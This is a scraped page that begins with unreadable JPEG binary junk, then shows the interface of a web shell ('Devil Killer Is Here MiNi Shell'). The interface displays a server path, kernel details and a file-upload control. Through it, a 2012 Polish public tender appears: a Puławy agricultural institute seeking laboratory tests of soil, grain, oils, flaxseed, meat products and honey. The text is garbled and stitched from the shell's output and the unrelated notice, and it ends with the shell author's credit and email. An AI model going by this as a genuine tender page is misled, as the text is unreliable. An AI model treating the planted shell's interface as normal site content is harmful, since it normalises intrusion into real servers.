JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120309/73554-N-2012.html

<p class="kh_header"><b>Puławy: Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 73554 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy , ul. Czartoryskich 8, 24-100 Puławy, woj. lubelskie, tel. 081 8863421 w.393, faks 081 8864547.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iung.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka badawczo-rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi badawczej polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych, zgodnie ze  szczegółowym opisem  zawartym w  opisie przedmiotu zamówienia - Załącznik  Nr 2  do SWIZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy(załącznik Nr 1),Pełnomocnictwo do reprezentowania wykonawcy o ile ofertę składa pełnomocnik, Oświadczenie w trybie art.22 ust.1 Ustawy Pzp (załącznika Nr 3)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iung.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy w  Puławach ul. Czartoryskich 8, 24-100 Puławy, pokój do spraw zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 08:00, miejsce: Instytut Uprawy Nawożenia i Gleboznawstwa - Państwowy Instytut Badawczy w  Puławach ul. Czartoryskich 8, 24-100 Puławy, Sekretariat Instytutu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wskazane zamówienie jest finansowane w ramach projektu: Rozwój klastra Dolina Ekologicznej Żywności o numerze POPW.01.04.03-00-013/09 realizowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Próby glebowe
Uprawy rolnicze - zakres oznaczeń wg tabeli 1
Uprawy sadownicze - zakres oznaczeń wg tabeli 1
Uprawy ogrodnicze - zakres oznaczeń wg tabeli 1
Wytyczne dotyczące norm i procedur badawczych:
pH- odczyn gleb w H2O i KCL, metoda potencjometryczna, wg: PN-ISO 10390:1997
P -fosfor przyswajalny, metoda spektrofotometryczna, wg: PN-R-04023:1996
K- potas przyswajalny, metoda fotometrii płomieniowej , wg: PN-R-0422:1996/Az1:2002
Mg - magnez przyswajalny, metoda absorpcyjnej spektrometrii atomowej, wg: PN-R-04020:1994/Az1:2004
Oznaczenie zasolenia 
B- bor przyswajalny, metoda spektrofotometryczna, wg: PN-R-04018:1993
Cu - miedź przyswajalna metoda absorpcyjnej spektrometrii atomowej, wg: PN-R-04017:1992
Mn- mangan przyswajalny, metoda absorpcyjnej spektrometrii atomowej, wg: PN-R-04019:1993
Zn - cynk przyswajalny, metoda absorpcyjnej spektrometrii atomowej, wg: PN-R-04016:1992
Fe- żelazo przyswajalne, metoda absorpcyjnej spektrometrii atomowej, wg: PN-R-04021:1994
Badania laboratoryjne należy wykonać w laboratorium badawczym mającym wdrożony system zarządzania i akredytację w polskim centrum Akredytacji. Metodyka badawcza wg. Polskich norm
Załącznik A - lista z numeracją próbek glebowych (po podpisaniu umowy zostanie przekazany Wykonawcy)
szczegołowy opis załącznik Nr 2 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Próby roślinne (ziarno zbóż)
Szczegółowy zakres analiz jakościowych ziarna i maki powinien obejmować:
Ocenę fizyko chemiczną ziarna: 
masa 1000 ziaren,
gęstość w stanie usypowym (ciężar hektolitrowy),
celność i wyrównanie, szklistość,
twardość przy użyciu przystawki Brabendera do farinografu przy szczelinie mielącej 100 5,
zawartość popiołu całkowitego (w temp. 900oC),
zawartość białka ogółem  metodą Kjeldahla (Nx5,70),
zawartość okrywy.
Ocenę przemiału laboratoryjnego wydajność mąki i otrąb.
Ocenę ilości i jakości substancji białkowych w mące.
zawartość białka ogółem - metodą Kjeldahla (Nx5,83),
ilość glutenu mokrego i indeks glutenowy w systemie Glutomatic 2200 (PN 93A 7404202), 
wskaźnik sedymentacyjny Zeleny ego (PN ISO  5529  1998),
liczba opadania  metodą Hagberga Pertena (PN ISO 3093  1996).
szczegółowy opis w załączniku Nr 2 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Próbki artykułów spożywczych 
Olej lniany i rzepakowy (tłoczony na zimno)
Zawartość tokoferoli 	PN EN ISO 12822 2002
Liczba kwasowa metodą miareczkową
PNEN ISO 660  2009
Zawartość zanieczyszczeń 
nierozpuszczalnych  %	PN EN ISO 663 2009
Oznaczenie składu kwasów tłuszczowych metodą chromatografii gazowej DS. PA 05 wyd.3 z dnia 01.12.06
Liczba nadtlenkowa metodą miareczkową 	PN EN ISO  3960  2009
Zawartość wody i substancji lotnych 	Pn EN ISO 662  2001
Oznaczenie liczby anizydynowej	Metodyka badawcza  wg. aktualnie obowiązujących polskich norm
dotyczących olejów i tłuszczów roślinnych
Zawartość izomerów trans kw. tłuszczowych	j.w.
Zawartość kw. erukowego	j.w.
Zawartość witamin: A, D, E, K 	j.w.
Zawartość wielopierścieniowych węglowodorów aromatycznych WWA	j.w.
Określenie wartości odżywczej -wartość energetyczna (energia), zawartość białka, węglowodanów i tłuszczu	j.w.
Określenie terminu przydatności do spożycia i warunków przechowywania j.w.
szczegółowy opis w załączniku Nr 2 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Próbki artykułów spożywczych 
Odtłuszczone mielone siemię lniane 
Oznaczenie składu kwasów tłuszczowych metodą chromatografii gazowej DS.PA05 wyd.3 z dnia 01.12.06
Określenie wartości odżywczej wartość energetyczna (energia), zawartość białka, węglowodanów i tłuszczu
Metodyka badawcza  wg. aktualnie obowiązujących polskich norm 
Zawartość witamin: A, D, E, K	Metodyka badawcza  wg. aktualnie obowiązujących polskich norm 
Analizy bakteriologiczne Salmonella, E. coli, Listeria	Metodyka badawcza  wg. aktualnie obowiązujących polskich norm 
szczegółowy opis w załączniku Nr 2 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa
Technologiczna/ *	Badania chemiczne:
sól,
azotany i azotyny, fosfor, białko,
woda,
tłuszcz,
metale ciężkie
	Badania
Mikrobiolog- giczne:
Salmonella,E.Coli,Listeria monocytogenes,	
Próby czystościowe:
ogólna liczba bakterii,pałeczki okrężnicy,gronkowce chorobotwórcze	
Badania trwałościowe:
Produkty pakowane próżniowo,
produkty luzem
szczegółowy opis w załączniku Nr 2 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie usługi polegającej na przeprowadzeniu badań laboratoryjnych próbek glebowych, roślinnych oraz artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie miodu - 4 próbki
Oznaczenie zawartości wody
 refraktometrycznie	PN-88 A 77626
Oznaczenie zawartości cukrów prostych 
 suma glukozy i fruktozy oraz sacharozy	Metoda HPLC,PB-02
Oznaczenie  zawartości 
5 hydroksymetylofurfuralu	Metoda HPLC, PB  04
Oznaczenie zawartości
proliny	PN-88 A  77626
Oznaczenie liczby
diastazowej	PB  06
Oznaczenie pH i wolnych
kwasów	PB  07
Oznaczenie przewodności 
właściwej	PN-88A 77626
Identyfikacja odmiany miodu za pomocą 
Analizy pyłkowej- udział pyłku przewodniego	PN 88 A 77626
Kontrola wymagań organoleptycznych
zapach, smak, barwa , konsystencja	PN 88 A 77626
szczegółowy opis w załączniku Nr 2 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com